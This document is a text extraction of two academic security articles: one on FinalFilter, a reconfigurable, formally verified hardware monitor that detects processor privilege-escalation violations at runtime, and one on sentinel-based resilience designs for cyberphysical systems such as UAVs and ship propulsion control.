ideal out of reach. The complete verification of a mod-ern processor remains intractable. Statically verifying even a simple security property—for example, “hard-ware privilege escalation never occurs”—remains beyond the state of the art in formal verification.

Testing can complement formal verification meth-ods, yet testing is incomplete and bugs in the hardware that leave it vulnerable continue to elude test suites. Further, a crafty malicious actor can evade typical testing coverage metrics.

Recent efforts, including that of three of the authors, have explored the use of static analysis on the design files (e.g., hardware description level source code or gate-level netlists) to find suspicious circuitry.1–3 These techniques rely on heuristics to define patterns that indicate a likely trojan and then search for instances in the design that match the pat-tern. However, malicious circuitry that does not match the pattern will be missed, as will inadvertent bugs that open vulnerabilities. By the time the weakness is uncovered, the hardware is already in the end user's hands and vulnerable to attack.

In the absence of a full proof of correctness, what is needed is a final filter: a runtime verification tech-nique that works—postdeployment—to detect and respond to security property violations as they occur

during execution. In this article, we make the case for final filters using our tool, FinalFilter, as a case study.

FINALFILTERPrior research, including our own, has shown that assertions hard-coded into the design can be a cheap and effective way to verify the correctness of any sin-gle execution run.4,5 Assertions can cover properties that would be intractable to prove statically for the cur-rent state of the art. The downside is that, like all exe-cution monitors, this approach cannot prove that the property can never be violated, only that if such a viola-tion occurs the monitor will catch it. As such, a final fil-ter is a verification approach that is complementary to and should be used in conjunction with existing test-ing and static verification methods.

We extend the basic idea of an assertion-based execution monitor to make it configurable so that the set of properties being monitored can be updated postdeployment to reflect new information about exploitable vulnerabilities in the design. FinalFilter is a reconfigurable, run-time verification system that monitors the state and events of the processor for invalid updates to privileged registers.

The mechanism of a final filter is simple and pres-ents a small attack surface. Yet, making it configurable does add complexity. To minimize FinalFilter's cost to the system's trustworthiness, we formally verify the correctness properties of its component modules and of the composed system. Finally, we show how to verify key properties for individual configurations.

As a formally verified execution monitor, FinalFilter guarantees that any trace violating a given security


vol. 39, no. 4, 2019

Digital Object Identifier 10.1109/MM.2019.2921509 Date of current version 23 July 2019.


EXPERT OPINION

property will be detected at the point of violation. This is indepen-dent of how the violation occurs or what the root cause is.

THREAT MODELThe trusted computing base for FinalFilter includes our specifi-cation and verification process and tools, the fabrication process and tools, and the filter's current configuration.

Lifecycle AssumptionsReferring to Figure 1, we assume we are the last ones to touch the pro-cessor design. We rely on orthogo-nal techniques to ensure that Final-Filter is not tampered with in the supply chain, which includes fabri-cation of the processor and shipping to the end user.

Architectural ScopeFinalFilter protects privileged instruction set architec-ture (ISA)-level registers. FinalFilter does not detect side-channel attacks as doing so requires knowledge of more than the current trace of execution. The focus of this paper is the integer core of the processor. Nota-bly, we assume the memory hierarchy is correct.

Attacker ModelThe attacker is free to take any action not precluded by our assumptions, either in hardware or in software. This includes an attacker capable of creating and exploiting a hardware defect. An example might be a defect that causes the processor to return from an exception without restoring the privilege level.

DESIGNFinalFilter enforces properties over privileged ISA state and events necessary for the security of soft-ware running on the processor. An example property that we will return to is, “the processor transitions from user mode to supervisor mode if, and only if, there is an interrupt or exception.” Any processor that correctly implements the specification must satisfy this property. Proving this property statically requires

a proof across all possible execution traces—cur-rently an intractable task. Yet, as an execution mon-itor, FinalFilter can verify the property for every trace that is executed. Monitoring is done by a set of hardware-based assertions over architecturally visi-ble states and events.

FinalFilter is designed to be used in conjunction with existing software-level recovery and repair tools. For example, BlueChip,1 a tool developed by three of the authors, can route execution around vulnerable circuitry. FinalFilter provides precise introspection points and can support a variety of repair and recovery approaches.

Three aspects of the design are worth noting.

1. FinalFilter is reconfigurable after deployment and can protect multiple security-critical properties concurrently.

2. FinalFilter's design is formally specified and its implementation proven correct.

3. Execution overhead is incurred only in the rare case that a processor violates one of the monitored security properties.

The key insight that allowed us to make the monitor both reconfigurable and able to handle multiple invari-ants concurrently is that many security properties can

FIGURE 1. Processor design flow with FinalFilter: (a) Hardware description language implementation of the instruction set specification. (b) Vulnerability is accidentally or maliciously opened in the processor. (c) FinalFilter is added to the design as the last action,6 with taps directly on the outputs of ISA state storing elements. (d) FinalFilter dynamically verifies the properties encoded by trusted software. FinalFilter triggers existing repair/recovery approaches in the event of an invariant violation. FinalFilter continues to protect the repair/recovery software.


EXPERT OPINION

be implemented as a Boolean combination of more simple assertions, and these simple component asser-tions are usually in one of only a few forms. Users can specify a number of simple component assertions and combine them into one or more complex assertions that monitor hardware state.

Running ExampleWe use security invariants (or just invariants) to describe properties of the ISA that must be true of a secure implementation—that if violated would open an exploitable vulnerability. Invariants are dynamically verified by one or more assertions over architecturally visible state.

Consider the following component of the privilege escalation property mentioned before:

I0 A change in processor mode from low priviledge to high priviledge is caused only by an exception or a reset.

Invariant I0 is a statement that the instruction set specification says must be true of the system at all points of execution. It can be written as a concrete assertion in terms of the ISA-level state in the follow-ing way:

A0 assert(risingEdge( ) ( [31 : 12] 0) risingEdge( ) ( [7 : 0] 0) risingEdge( ) ( 1))

where represents the supervisor mode bit of the processor's status register, and an exception is indicated by the next program counter NPCpointing to an exception vector start address. The address will always be of the form 0x00000X00, where the “X” indi-cates a don't-care value. (This might seem as if it leaves the door open for a processor attack that escalates privilege while executing at an address that matches the form 0x00000X00, but it does not. Pages in that address range have supervisor permissions set which implies that code executing in that address range is already in supervisor mode. If the processor attack attempts to allow user mode execution of supervisor mode pages, FinalFilter includes an invariant to detect such misbehavior.)

We break A0 into three component assertions.

Aa assert(risingEdge( ) ( [31 : 12] 0)) Ab assert(risingEdge( ) ( [7 : 0] 0)) Ac assert(risingEdge( ) ( 1))

Each of these individual assertions is evaluated at each step of execution, and the results are appropriately combined to form a statement that is equivalent to A0.

Invariant MonitorFinalFilter reads in ISA-level state and outputs a signal indicating whether any of the programmed invariants were violated. It works essentially as a programmable finite state machine. Configuration data programs the machine with which invariants to check and ISA-level state acts as the input to the machine. The number of invariants it can monitor concurrently depends on the complexity of the associated component assertions and the number of assertion blocks built into the monitor.

Using our running example, we now describe each module in the configurable monitor, shown in its configured state in Figure 2. In our system, we refer to Aa, Ab, and Ac as component assertions, and A0 as simply an assertion. The difference being that Anumber is the implementation of an invariant, a combination of component assertions, whereas Aletter represents a component assertion corresponding to one assertion block in the configurable monitor.

Routing. The Routing block is responsible for feed-ing the desired ISA-level state to the Logic blocks. The configuration data determines which state ele-ment gets routed to which Logic block. To accommo-date arbitrary outputs, each Routing block output is 32 bits wide, with zero padding as required. In our running example, is output to Logic blocks 0, 2, and 4,

is output to Logic blocks 1 and 3, and is out-put to Logic block 5, as shown in Figure 2.

Logic. Each Logic block implements a comparison operator. Given two inputs A and B, the configura-tion data can select one comparison operator from the set {=,≠,≤,<,≥,>}. Additionally, the configuration data can choose to mask off some portion of A or B, or both, or it can substitute a constant value for the value in B. Returning to our running example, Logic block 1 will evaluate and output the result. Logic block 3 will evaluate


EXPERT OPINION

and output the result and Logic block 5 will evaluate and output the result. Logic blocks 0, 2, and 4

will evaluate and output the result.

Assert. The Assert block implements component assertions of the form p q, possibly across several clock cycles (e.g., if p is true then three cycles later, q is true). If it is ever the case that p is true while q is false, the assertion is triggered and the output of the Assert block will be high. In our example, each of Aa, Ab, and Ac are implemented in their own Assert block. The consequent q is always a combinational prop-osition over ISA state at a single step of execution: it is stateless and is given by the current value sent by the Logic block. However, the antecedent p can be stateful, possibly depending on previous values sent from the Logic block. For example, the individ-ual assertions in our example all have the antecedent

. This proposition is true at time t if and only if is low at time t–1 and high at time t. The Logic block will output a signal that is high when-ever is high and the Assert block will determine when a rising edge of is seen. FinalFilter allows antecedents in one of three forms: p { , st–1 st, st–n}. In other words, p can be defined as True, in which case the assertion will trigger whenever q is false, or p can be defined to be the rising edge of some ISA state s, or p can be defined to be the value of ISA state s at time t–n, where n is also configurable.

The Assert block uses four of the industry standard Open Verification Library assertions:

› always(expression): expression must always be true,

› edge(type, trigger, expression): expression must be true when the trigger goes from 0 to 1 (type = positive),

› next(trigger, expression, cycles): expression must be true cycles clock ticks after trigger goes from 0 to 1,

› delta(signal, min, max): when signal changes value, the difference must be between min and max, inclusive.

Merge. The Merge block takes the outputs from the Assert blocks and combines them as prescribed by the configuration data. It can be viewed as a configurable

truth table. The inputs to the truth table are the Assert block outputs—the component assertions Aa, Ab, and Ac in our running example. The function defining how the component assertions combine (i.e., the out function) is configurable at run time. The truth table is implemented as a hierarchy of look-up tables. For example, with 16 Assert blocks, rather than a single lookup table with 216 rows, the monitor would have four lookup tables with six inputs (26 rows) each. The outputs of the three first-level lookup tables make up the input to a second-level lookup table, the output of which is the output of the Merge block.

We can now complete our running example. Let erra be the output of the Assert block for Aa, and let errb and errc be the output of the Assert blocks for Ab and Ac, respectively. Remembering that the output of each Assert block will be high when the assert triggers, i.e., when the invariant is violated, we combine the results of the component assertions in the following way:

err0=(erra|errb)& errc.

FIGURE 2. FinalFilter configured with assertion A0. Starting from the top of the figure, the components are: ISA-level state, Routing block, Logic blocks, Assert blocks, and Merge block. The Routing block sends ISA-level state elements to the Logic blocks; the Logic blocks condense multibit state and constant inputs down to a single bit output that is sent to the Assert block; the Assert block compares the previous value of its inputs to the current value, outputing the result as a one bit value to the Merge block; the Merge block combines the Assertion block results to form a higher level result that indicates if the programmed invariants still hold; this result is tied to the processor’s exception generation logic.


EXPERT OPINION

As desired, err0 will be high whenever A0 is false, i.e., whenever the A0 assertion is triggered.

Configuration Data. The configuration data are pro-vided by trusted software (e.g., the system BIOS) at ini-tialization (originally, we imagine configuration coming from processor or motherboard manufacturers). It is the mechanism by which FinalFilter is configured, and portions of the configuration data are fed into each block at the appropriate stage.

VERIFICATIONWe used the commercial model checking tool Cadence SMV for the verification of the configurable assertion fabric. For each component of FinalFilter shown in Fig-ure 2, we formally specified its behavior and verified that the implementation meets the specification.

In most cases, formally specifying a component's behavior involved little more than extracting the infor-mation from the design documents. However, in two cases, the process of formalizing the specification brought out ambiguities in the design, and it was neces-sary to revisit the design phase of the process. During the course of verification, we found one implementation error: a logical and was used where an or was needed.

Ultimately, the monitor's behavior is determined by the configuration data, and it is up to the proces-sor or motherboard manufacturer to provide a correct configuration. A misconfigured fabric could fail to provide the intended protections. We guard against misconfigurations in three ways.

First, we protect against invalid configurations that would result in unpredictable results. Built in to the design of each block is a check that the incoming configuration data are well formed. We verify that if any of the individual components report an invalid configuration, then FinalFilter will not fire any asser-tion failures. This behavior represents a tradeoff in the design space. On the one hand, an accidentally miscon-figured fabric, which will never trigger an assertion, is not protecting the user. On the other hand, never firing in the presence of misconfigured data has the benefit of being a stable behavior— it is what exists today. An alternative is to always fire when the fabric is miscon-figured, but this would give an attacker an avenue for launching a denial-of-service attack making FinalFilter a new avenue of attack, something we wish to avoid.

Second, we built a software tool to generate the configuration data from higher level assertion state-ments. Although only prototypical, we hope that fur-ther developing this tool will make generating correct configuration data relatively easy for the user.

Third, we built a validation tool to prove properties about individual configurations. We prove the follow-ing sanity checks on the configuration data:•

› There are assertions configured. › None of the assertions are unsatisfiable (e.g.,

the following does not occur { q q}). › The configured assertions, as a whole, are

satisfiable (e.g., the following does not occur {p q; p q}).

› Assertions are not trivially violated (e.g., the following does not occur {p p}).

If any of these checks fail, a misconfiguration error is reported along with information about the offending assertion(s). The user can run this tool before loading the configuration data into FinalFilter. We used the z3 SMT solver as the back end to this tool.

We note that while we formally verify the functional correctness of each module in the filter, we manually audit the connection between modules. That is, we manually check that every module's output signals are appropriately tied to the next module's input signals. There is no logic involved in the composition and our naming convention made the checks straightforward. Our end-to-end verification of the invalid configura-tion signals, mentioned above, does not rely on this manual audit.

EVALUATIONTo evaluate the performance and efficacy of Final-Filter, we implement it inside the OR1200 Processor. The OR1200 is an open source, 32-bit RISC processor with a five-stage pipeline, separate data and instruc-tion caches, and MMU support for virtual memory. It is popular as a research prototype and has been used in industry as well7; it is representative of what you would see in a mid-range phone today.

We wrote a program that automatically generates the FinalFilter hardware for a given number of Assert blocks to support. Generating the hardware program-matically makes it easy to explore the effect of tuning


EXPERT OPINION

different parameters, and creates a regular naming and connection pattern that allows us to verify the structural connections of arbitrary filters using an induction type approach.

For a complete system capable of booting Linux, we implemented the processor and filter combination as the heart of a system-on-chip that includes DD2 memory, an Ethernet controller, and a UART controller. We implemented the system-on-chip on the FPGA that comes with the Xilinx XUP-V5 development board. We conservatively clock the system at 50 MHz.

Hardware Area OverheadFigure 3 shows how the hardware area overhead changes as the number of assertions supported by FinalFilter increases. We built filters with support for as little as 1 assertion to as many as 17 assertions (the number required to protect all AMD processors we analyzed in our previous study on security-critical pro-cessor bugs5).

The figure contains data at four points in the fabric design space:

1. None. No optimization, this favors expressibility over overhead.

2. One State. This optimization uses Logic blocks with only one state input. Logic blocks were the biggest contributor to the area of the fabric and 83% of our security-critical invariants used only one input to the Logic block. This also reduces the number of required Routing blocks by 50%.

3. Top six. This optimization replaces the Routing blocks with new Routing blocks capable of handling the six most frequently used state elements. We observe that 76% of invariants require the same six ISA-level state items.

4. Both. This includes the two previous optimizations.

USING FINALFILTERUsing FinalFilter requires having a meaningful set of properties to monitor. In prior work, we took a manual approach to develop a set of security critical proper-ties.5 We studied errata documents to learn what types of exploitable errors can occur and we studied the architecture's specification documents to develop a set of properties necessary—though not sufficient—to

protect security critical state of the processor.In subsequent work, one of the authors has devel-

oped a semiautomated method for learning new secu-rity properties using information gleaned from known exploitable bugs8; and demonstrated that properties developed for one RISC processor may be suitable for use, after some translation, on a second RISC proces-sor, even across architectures.9 However, the develop-ment of security-critical properties for use with Final-Filter or any property-based verification method is still in its infancy and more research is needed.

Case StudyWe configured FinalFilter with 18 assertions we found to be critical to security in our prior work.5 We then introduced into the processor 14 vulnerabilities from a mix of previously published hardware attacks and attacks based on exploitable vulnerabilities from sev-eral years of AMD processor errata. For each one, we wrote a user-space program that exploits the vulnera-bility and reports if the attack was successful. FinalFil-ter is expressive enough to implement all 18 invariants, and the configured filter detects all of the attacks.

FIGURE 3. Hardware overhead with respect to the number of assertions supported by the configurable assertion fabric, evaluated at four optimization levels. The range in the number of assertions represents the range in protection required by the processors in our analyzed set from AMD. The vertical line represents the average number of assertions required to protect the processors in our analyzed set. As a reference point, previous work on deployed-bug patching entails hard-ware overheads of up to 200% and run time overheads of up to 100% in the common case.


EXPERT OPINION

PRIOR WORK IN DYNAMIC VERIFICATION

FinalFilter builds on a line of research that uses dynamic verification to catch and patch functional bugs postdeployment. For example, DIVA10 is a sim-plified checker core that verifies the computation results of the full-featured core before the processor commits the results to the ISA level. Narayanasamy et al.11 use instruction rewriting routines to avoid trigger-ing a bug that is found postdeployment.

In this article, we have not addressed the problem of measuring coverage. Boulé et al. 12 add circuitry to assertions to track and measure coverage. The ques-tion of what is a meaningful coverage metric for a set of security properties is an open one, but it is critical: such a measure can give an indication of the number of “unknown unknowns” that remain unprotected.

CONCLUSIONDesign-time verification alone is insufficient; some exploitable vulnerabilities will make it through. Final-Filter, a last line of defense—one that can be formally verified—protects security critical properties of the processor core. We believe the idea is broadly appli-cable and in future work will be exploring the use of a final filter for commercial architectures and for mod-ules outside the processor core.

ACKNOWLEDGMENTThe authors would like to thank the editors for their insightful comments and suggestions, and S. Bellovin for his advice and the phrase “final filter.”

REFERENCES1. M. Hicks, M. Finnicum, S. T. King, M. M. K. Martin, and J.

M. Smith, “Overcoming an untrusted computing base: Detecting and removing malicious hardware automati-cally,” in Proc. IEEE Secur. Privacy, 2010, pp. 159–172.

2. J. Zhang, F. Yuan, L. Wei, Z. Sun, and Q. Xu, “VeriTrust: Verification for hardware trust,” in Proc. ACM Des. Autom. Conf., 2013, pp. 61:1–61:8.

3. A. Waksman, M. Suozzo, and S. Sethumadhavan, “FANCI: Identification of stealthy malicious logic using boolean functional analysis,” in Proc. ACM Conf. Comput. Commun. Secur., 2013, pp. 697–708.

4. M. Bilzor, C. Irvine, T. Huffmire, and T. Levin, “Security checkers: Detecting processor malicious inclusions at runtime,” in Proc. IEEE Hardware Oriented Secur. Trust, 2011, pp. 34–39.

5. M. Hicks, C. Sturton, S. T. King, and J. M. Smith, “SPECS: A lightweight runtime mechanism for protecting software from security-critical processor bugs,” in Proc. ACM Conf. Architectural Support Program. Lang. Oper. Syst., 2015, pp. 517–529.

6. A. Waksman and S. Sethumadhavan, “Silencing hard-ware backdoors,” in Proc. IEEE Symp. Secur. Privacy, 2011, pp. 49–63.

7. R. Rubenstein, “Open Source MCU core steps in to power third generation chip,” Jan. 2014. [Online]. Avail-able: http://www.newelectronics.co.uk/electronics -technology/open-source-mcu- core-steps-in-to -power-third-generation-chip/59110/

8. R. Zhang, N. Stanley, C. Griggs, A. Chi, and C. Sturton, “Identifying security critical properties for the dynamic verification of a processor,” in Proc. ACM Conf. Architec-tural Support Programming Lang. Operating Syst., 2017, pp. 541–554.

9. R. Zhang, C. Deutschbein, P. Huang, and C. Sturton, “End-to-end automated exploit generation for diag-nosing processor designs,” in Proc. IEEE/ACM Symp. Microarchit., 2018, pp. 815–827.

10. T. M. Austin, “DIVA: a reliable substrate for deep sub-micron microarchitecture design,” in Proc. ACM/IEEE MICRO, Haifa, Israel, Nov. 1999, pp. 196–207. [Online]. Available: http://www.eecs.umich.edu/ taustin/papers/MICRO32-diva.pdf

11. S. Narayanasamy, B. Carneal, and B. Calder, “Patching processor design errors,” in Proc. IEEE Int. Conf. Comput. Des., Oct. 2006, pp. 491–498. [Online]. Available: http: //cseweb.ucsd.edu/ calder/papers/ICCD-06-HWPatch.pdf

12. M. Boule, J. Chenard, and Z. Zilic, “Adding debug enhancements to assertion checkers for hardware

DESIGN-TIME VERIFICATION ALONE IS INSUFFICIENT; SOME EXPLOITABLE VULNERABILITIES WILL MAKE IT THROUGH. FINALFILTER, A LAST LINE OF DEFENSE—ONE THAT CAN BE FORMALLY VERIFIED—PROTECTS SECURITY CRITICAL PROPERTIES OF THE PROCESSOR CORE.


EXPERT OPINION

emulation and silicon debug,” in Proc. Int. Conf. Comput. Des., 2006, pp. 294–299.

CYNTHIA STURTON is an assistant professor and Peter Thacher Grauer Fellow at the University of North Carolina at Chapel Hill. She leads the Hardware Security @ UNC research group to investigate the use of static and dynamic analysis techniques to protect against vulnerable hardware designs. Her research is funded by several National Science Founda-tion awards, the Semiconductor Research Corporation, Intel, a Junior Faculty Development Award from the University of North Carolina, and a Google Faculty Research Award. She was recently awarded the Computer Science Departmental Teaching Award at the University of North Carolina. She has a BSE from Arizona State University and an MS and a PhD from the University of California, Berkeley. Contact her at [email protected].

MATTHEW HICKS is an assistant professor at Virginia Tech, working at the intersection of security, architecture, and embedded systems, with special emphasis on analog-domain hardware security. Contact him at [email protected].

SAMUEL T. KING was a professor for eight years at the University Illinois Urbana-Champaign. He then left his tenured position at UIUC to push himself intellectually and professionally in industry. He is currently with the Computer Science Department at the University of California Davis. He is interested in building systems for fighting fraud and rethinking our notion of digital identity. He has a PhD from the University of Michigan, an MS from Stanford University, and a BS from UCLA. Contact him at [email protected].

JONATHAN M. SMITH is currently a program manager in the Information Innovation Office (I2O) at the Defense Advanced Projects Research Agency (DARPA) on leave from the Univer-sity of Pennsylvania, where he holds the Olga and Alberico Pompa Professorship of Engineering and Applied Science and is a professor of computer and information science. He was previously a Member of Technical Staff at Bell Telephone Lab-oratories and Bell Communications Research, joining Penn in 1989 after receiving his PhD from Columbia University. He pre-viously served as a Program Manager at DARPA in 2004–2006, and was awarded the Office of the Secretary of Defense Medal for Exceptional Public Service in 2006. He became an IEEE Fellow in 2001. Contact him at [email protected].

From the analytical engine to the supercomputer, from Pascal to von Neumann, from punched cards to CD-ROMs—IEEE Annals of the History of Computing covers the breadth of computer history. � e quarterly publication is an active center for the collection and dissemination of information on historical projects and organizations, oral history activities, and international conferences.

www.computer.org/annals


EDITORS: Mohamed Kaâniche, [email protected] Richard Kuhn, [email protected]

DEPARTMENT: RESILIENT SECURITY

Cyberattack-Resilient Cyberphysical SystemsBarry M. Horowitz, University of Virginia

A great deal of attention is currently being placed on the development of advanced auto-mation for physical systems, including a wide

array of applications such as automobiles, unmanned air vehicles (UAVs), the Internet of Things, and 3D printers. These automation opportunities introduce cyberattack risks that can lead to loss of human life or serious injury. The cyberattack risks related to physical systems first received national attention in 2011 due to the Stuxnet cyberattack, which disrupted industrial Iranian centrifuges employed in nuclear reactors.1

General recognition of the continuously grow-ing cyberattack risk situations has led a University of Virginia (UVA) research team to conduct studies that address providing cyberattack-resilient designs for cyberphysical systems that can complement solutions that seek to provide defense against cyberattacks. Since 2011, the UVA team, under my direction, has been engaging in research efforts exploring 1) system architectures for achieving resilience, 2) system meth-odologies and analysis tools for prioritizing resilience solutions, and 3) the roles and procedures for engag-ing operators in the real-time management of system reconfigurations that provide resilience. The methods have been demonstrated to be effective across a broad range of applications, including UAVs, automobiles, 3D printers, and others. This article describes this com-prehensive approach to resilience in cyberphysical systems and research advances on the horizon.

DEFINING RESILIENCESystem engineers have been designing resilient elec-tronic systems for many years (e.g., air traffic control

systems and military nuclear weapon command con-trol systems), employing what is referred to as diverse redundancy to permit dynamic reconfigurations of an abnormally behaving system. Diverse redundancy is a system design methodology that employs alter-nate methods for reconfiguring and operating a sys-tem under circumstances where the normal modes of operation become inoperable. In 2009, Riegar et al.2 defined resiliency as the capacity of a system to maintain state awareness and to proactively main-tain a safe level of operational normalcy in response to anomalies, including threats of a malicious and unex-pected nature.

To provide cyber resiliency, a system must be designed to include a monitoring process related to cyberattacks and alternate diverse sets of hardware and software that, when called upon, would permit continued operation of the system. For the research efforts reported on in this article, a system architec-ture that includes the required anticipatory processes for monitoring and reconfiguration control is provided by a subsystem referred to as a sentinel, which, to be viable for its role, should be designed to be far more secure than the system being addressed for resil-iency.3 While the sentinel-based cyberattack detec-tion process is expected to be automated, the level of reconfiguration automation may vary across system functions:

› Totally automated: Sentinel determines what to do and informs appropriately trained system operators regarding automated execution.

› Semiautomated: System operators receive automated recommendation(s) from the senti-nel and, accounting for both situation context and a broader set of information available to them, decide on what to do.


vol. 18, no. 1, 2020

Digital Object Identifier 10.1109/MSEC.2019.2947123 Date of current version: 23 January 2020


RESILIENT SECURITY

› Manual: Operators, or higher levels in the system control hierarchy, determine what to do.

In addition, resilience includes containing the immediate consequences of the detected attack and postattack forensic support based upon the data collected for addressing anomalies. Figure 1 provides a representation of a sentinel-based system architecture for providing cyberattack resilience. The employed system architectural approach is referred to as system-aware cybersecurity because attack detec-tion methods are based upon discovery of system operational symptoms that would likely result from successful cyberattacks.

Figure 2 provides a more detailed representation of sentinel functions. As illustrated in the figure, the sentinel is connected to system interfaces from which it receives the data to support its monitoring function. The design of the communication interfaces depends upon a variety of factors, ranging from wired to wire-less communications with a selection of protocols that depend upon the data to be sent and the formats and protocols of the functional subsystems to be mon-itored. The sentinel must then condition the diverse sets of collected data so that they can be integrated and analyzed. This includes setting of appropriate data rates, data formats, and communication protocols for use within the sentinel.

Once the data to be analyzed for resilience pur-poses are ready for use, the sentinel performs the

specific analyses required for detection of a cyberat-tack and determination of the location within the protected system that is under attack. When an attack is detected, the sentinel must prepare messages for the system users containing information regarding the detected attack and the steps required to reconfigure the system for continued operation. These messages must then be assembled for communication and computer control of the subsystems involved in the resilience-related reconfiguration solution.

In addition, the sentinel must prepare and dissemi-nate its results for users engaged in more strategic roles (e.g., machine-learning purposes, forensics, etc.) related to managing resilience. There are a wide variety of possibilities for the hardware/software design of sentinels that are dependent on the system

InternalControls

Reconfiguration Controls

Most Highly Secured

SentinelProviding

System-AwareSecurity

InternalMeasurements

System to BeProtected+ Diverse

Redundance

Outputs

FIGURE 1. The architecture of sentinel-based cyberattack resilience.

System to Be ProtectedSentinel Providing

System-Aware Security

System ControlInformation

Sensors

Mass Storage

DataConditioning

DataIntegration

DataAnalysis

DecisionMaking

SystemsCommunication

Channels

Reconfigurable DiverseRedundant Components

SecurityCommunication

Channels

Actions• Forward Data• Isolate Threat• Restore System

FIGURE 2. The sentinel data flow.


RESILIENT SECURITY

being supported. For example, implementation can be through a single computing node or through a highly distributed set of nodes, and selection of the design should be highly dependent on the methods of security that can be applied for protection of the sentinel (see the “Cyberattack Protection of the Sentinel” section).

The anticipated value of employing this type of resilience solution is that it requires the cyberattacker both to understand how the system to be attacked is designed and to develop and employ multiple attacks on diversely redundant subsystems to sufficiently disrupt the targeted system. This, in turn, should impact the cost, time, technical complexity, and risk for creating the desired cyberattacks, with the objec-tive of deterring attackers from going ahead with their desire to be disruptive. Of course, the resilience solu-tion must be sufficiently low cost, timely, low risk, and effective to make it an attractive option.

DETECTING SUCCESSFUL CYBERATTACKS

In this section, I describe mechanisms for cyberattack detection by a sentinel subsystem. To provide quality and cost advantages, the suggested system-aware design approach includes reusable design patterns for detecting successful cyberattacks. Example attack detection design patterns include:

1. discovery of data inconsistencies within the system with no other explainable cause (e.g.,

operator system control inputs are different from the inputs received by the related con-trolled subsystems, diverse sensors provide inconsistent measurements)

2. detection of changes of system operational parameters without authorized and operation-ally correct procedures, resulting in significant performance consequences (e.g., changes to navigation waypoints in a UAV resulting in modification of a UAV’s route, changes to the detection threshold values in a radar system resulting in modification of false alarm/missed detection rates for that radar system, changes in the selection of transmission power levels in a software-controlled radio system that cause communication range and radio interference problems)

3. recognizing significant unexplainable incom-patibilities between internal system communi-cation levels and the presentation of situation awareness information provided to system operators (e.g., air defense system operator provided with low levels of traffic information, but sensors are observed to be communicating information that should be presented at high rates).

While each of these examples applies to a wide variety of physical systems, the implementation of specific solutions will vary across different systems.

Engine1

Engine2

PropulsionController

1

PropulsionController

2

OperatorInterface

1

OperatorInterface

2

Hopper Voter

NetworkSwitch 1Model A

NetworkSwitch 2Model B

NetworkSwitch 2Model C

FIGURE 3.The technical configuration for hopping/voting resilience design pattern for ship propulsion control.


RESILIENT SECURITY

The system-aware research efforts have included prototype designs that employed the example design patterns described previously as well as others for detecting cyberattacks on UAVs, police cars, 3D print-ers, and military systems. Note that the consequences of a cyberattack can vary significantly depending upon the actual system being attacked, so risk-based deci-sions are required in terms of which design patterns reduce the risks of attack most significantly. Further-more, as noted previously, resilient system efforts must be directed toward achieving designs that are highly secured.

SYSTEM RECONFIGURATION SOLUTIONS

As illustrated earlier in discussing reusable design pat-terns for cyberattack detection, designs that exploit diverse redundancy for continuing operation also are reusable, but implementation and risk reduction value depend upon the actual system to be protected. In addition, diverse solutions typically do not perform as well as the normal mode of system operation, although they are potentially acceptable for continuing opera-tion. Examples of diverse redundancy opportunities include the following:

› use of diverse sensors for providing situation awareness information (e.g., radar, infrared, audio, video, and many other technologies that can potentially be used as the basis for surveil-lance subsystems)

› use of diverse navigation subsystems (e.g., GPS, inertial navigation)

› use of relatively common subsystems, but designed and produced with different hardware and software by different manufacturers (e.g., different operating systems, application software, microelectronics components, com-munications switches).

As a result, designers of resilient systems must evaluate the losses in performance that could result when the protected system is reconfigured and the operational acceptability of such losses.

Resilience can also be achieved through the integration of multiple approaches for achieving diversity that serve both detection of attacks and

reconfiguration responses. For example, one of the design patterns derived from UVA’s research efforts is referred to as configuration hopping with voting. An experimental application of this design pattern, utiliz-ing multivariant programming4 via the use of three diversely manufactured communication switches and through comparison of message content going into and coming out of the switches, could determine if there was an inappropriately performing switch. If so, the improperly performing switch could be taken out of service while continuing system operation.

In addition, to make matters more complex for a cyberattacker intent on changing message content, the design pattern included the use of a moving target technique,5 dynamically changing which switch is to be operationally employed once every few seconds, with the use of randomly selected times for moving the potential targets. Since the diversely implemented switches were not closely synchronized in terms of order of messages and their timing, use of moving target defense brought with it the potential to create problems due to the timing of message processing within the diverse switches. To address this problem, message content comparisons were done in a batched manner at sufficiently spaced intervals (e.g., 20-s intervals) so as to reduce the percentage of deviating messages due to timing. The sentinel detection algo-rithms were designed to permit missing messages as a normal situation when the deviations occurred close to the switching times, and the operational system depended on its existing communication protocols to assure that missing messages due to dynamic changing of the switch in operation were either resent in a timely manner or were acceptable for loss at low rates.6

Operational prototype-based experiments related to control of a ship’s propulsion system were con-ducted to measure message loss rates. Results indicated that the number of lost messages due to a 20-hop/s resilience design was acceptably low (for a 250-Mb/s data rate involving 1-Kb User Datagram Protocol-formatted packets, results showed packet loss rates of fewer than two packets per 10,000 trans-mitted packets and that operators could dependably continue to carry out their propulsion control-related responsibilities with the reduced level of communica-tion system performance).


RESILIENT SECURITY

CYBERATTACK PROTECTION FOR THE SENTINEL

A significant design issue regarding achieving cyber-attack resilience for the protected system is the secu-rity designed into the sentinel, which can consist of a combination of both cyberattack defense and resil-ience solutions. The UVA design concept for sentinels builds on the engineering principle that they should be far less complex than the subsystems they protect, so as to provide the opportunity for employment of advanced security techniques that are limited in the scale and complexity of their application, such as soft-ware verification technologies applied for develop-ment and testing of sentinel software and software execution-related security techniques employed at the microelectronics level. For example, Draper Lab-oratory is currently engaged in research activities focused on achieving system security through hard-ware and firmware.11

In addition, the cost for applying diverse redundancy-based resilience for the sentinel itself can then be addressed within more acceptable cost boundaries. The UVA research efforts included operational demonstrations of prototypes that employed multivariant programming and moving target defenses within a sentinel design. These tech-niques proved to be effectively employed because the sentinels were designed to consist of algorithms for detection that were each implementable with fewer than 1,000 lines of code. The research served to support the concept that simple designs can indeed provide effective system resilience solutions and the basis for greater trust of the sentinel than would otherwise be possible.

RISK-BASED PRIORITIZATION OF ALTERNATIVE RESILIENCE SOLUTIONS

A critical aspect of cyberattack-resilient system design is the prioritization and selection of alternative system solutions. Part of the UVA research effort has focused on the development of a risk-based method-ology for prioritizing potential solutions. Referred to as cybersecurity requirements methodology (CSRM), the process for prioritizing potential system solutions involves collaboration among three small groups of participants (two to three members per group)

and requires approximately two months of effort to develop the results. The three groups are

› the blue team, consisting of individuals with significant operational experience regarding systems in the domain of the specific system under consideration for resilience solutions

› the red team, consisting of individuals with combined experience in both cybersecurity defense and offense

› a system engineering (SE) team, with experience in development of system requirements related to resilience.

Cyberattack risk analysis involves identifica-tion of potential system problems that can result in significant consequences and the likelihood of these problems occurring. The CSRM approach looks to the blue team to identify and prioritize potential system problems related to the operation of system functions and the corresponding consequences related to these problems that are of greatest concern.

